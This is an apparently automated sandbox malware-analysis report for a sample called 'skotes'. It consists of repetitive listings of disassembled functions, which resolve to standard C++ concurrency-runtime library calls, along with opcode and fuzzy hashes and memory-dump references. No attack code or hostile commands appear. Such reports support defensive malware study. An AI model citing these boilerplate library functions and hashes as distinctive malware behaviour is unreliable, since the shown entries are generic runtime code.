                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Concurrency::details::$Context$Base::Internal$ChoreWork$AssociatedCancelCleanupCompletionCreateCurrentDispatchedExecuteExecutedFoundInlineListThreadWait
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2885714658-0
                                                                                                                                                                    • Opcode ID: 9df37b25b52398150967001dbc33fb713c644b648571b76a85eb43c5ed7b311a
                                                                                                                                                                    • Instruction ID: 8371840ca426c8650e3cd2751560e71af1da2e686f461f7caa88d66e0d372685
                                                                                                                                                                    • Opcode Fuzzy Hash: 9df37b25b52398150967001dbc33fb713c644b648571b76a85eb43c5ed7b311a
                                                                                                                                                                    • Instruction Fuzzy Hash: 4841CF30A042449ADF55EFA0A4557ED7BA7AF11304F1440ADE9426F3C3CB758E09CBEA
                                                                                                                                                                    Function 0063E7AF Relevance: 10.6, APIs: 7, Instructions: 102COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0063E7D7
                                                                                                                                                                      • Part of subcall function 0063E544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0063E577
                                                                                                                                                                      • Part of subcall function 0063E544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0063E599
                                                                                                                                                                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0063E854
                                                                                                                                                                    • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0063E860
                                                                                                                                                                    • Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0063E86F
                                                                                                                                                                    • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0063E879
                                                                                                                                                                    • Concurrency::location::_Assign.LIBCMT ref: 0063E8AD
                                                                                                                                                                    • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0063E8B5
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1924466884-0
                                                                                                                                                                    • Opcode ID: 7ee3fbf7a2b930a22ac8d3b490863cb2751a5cab5075a3c5445c6f92601d3f86
                                                                                                                                                                    • Instruction ID: 6433d37b2479b1e8ef1437ae5510f135ea6c7e280728ad7e710fc7683b2410bb
                                                                                                                                                                    • Opcode Fuzzy Hash: 7ee3fbf7a2b930a22ac8d3b490863cb2751a5cab5075a3c5445c6f92601d3f86
                                                                                                                                                                    • Instruction Fuzzy Hash: E7411875A002149FCF45EF64C895AADB7BAFF48310F1480A9ED499B382DB70A941CFE1
                                                                                                                                                                    Function 00626E00 Relevance: 9.3, APIs: 6, Instructions: 336COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 00626ED1
                                                                                                                                                                    • std::_Rethrow_future_exception.LIBCPMT ref: 00626F22
                                                                                                                                                                    • std::_Rethrow_future_exception.LIBCPMT ref: 00626F32
                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 00626FD5
                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 006270DB
                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 00627116
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Mtx_unlock$Rethrow_future_exceptionstd::_
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1997747980-0
                                                                                                                                                                    • Opcode ID: 1509de0fda62cd73dae3813a430bedbf9c431fdace6f13eefb18c7b030efe23f
                                                                                                                                                                    • Instruction ID: 0fd07bc90890bb0ff3c63c794d87c6a3036afb57c1e400be8c37c2b05bc23285
                                                                                                                                                                    • Opcode Fuzzy Hash: 1509de0fda62cd73dae3813a430bedbf9c431fdace6f13eefb18c7b030efe23f
                                                                                                                                                                    • Instruction Fuzzy Hash: D8C1D2B0904A25DBDF20DF64E945BEEBBB6EF04310F04452DE81697781EB31A948CF62
                                                                                                                                                                    Function 006344DE Relevance: 9.2, APIs: 6, Instructions: 196timeCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ListArray.LIBCONCRT ref: 00634538
                                                                                                                                                                    • ListArray.LIBCONCRT ref: 0063456C
                                                                                                                                                                    • Hash.LIBCMT ref: 006345D5
                                                                                                                                                                    • Hash.LIBCMT ref: 006345E5
                                                                                                                                                                      • Part of subcall function 00639C41: std::bad_exception::bad_exception.LIBCMT ref: 00639C63
                                                                                                                                                                    • Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 0063474B
                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 006347A4
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ArrayHashList$AsyncConcurrency::details::Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLibraryLoadRegisterTimerstd::bad_exception::bad_exception
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3010677857-0
                                                                                                                                                                    • Opcode ID: 6cc3baa8eea0e5a980ae2340825fb768cc3b6929ec8655008608138bb69f30d5
                                                                                                                                                                    • Instruction ID: 5cdeb9ff8a6517232b2a92a8ede7f9719eb36bb91a7c7e89378cf7cd17f59d82
                                                                                                                                                                    • Opcode Fuzzy Hash: 6cc3baa8eea0e5a980ae2340825fb768cc3b6929ec8655008608138bb69f30d5
                                                                                                                                                                    • Instruction Fuzzy Hash: 49816FB0A11B22BBD748DF74C845BD9FAA9BF09700F10421EF42897281DBB5B624CBD5
                                                                                                                                                                    Function 0062ECE6 Relevance: 9.1, APIs: 6, Instructions: 101COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 0062ECED
                                                                                                                                                                    • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0062ED17
                                                                                                                                                                      • Part of subcall function 0062F3DD: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0062F3FA
                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 0062ED53
                                                                                                                                                                    • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 0062ED94
                                                                                                                                                                    • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0062EDC6
                                                                                                                                                                    • __freea.LIBCMT ref: 0062EDEC
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
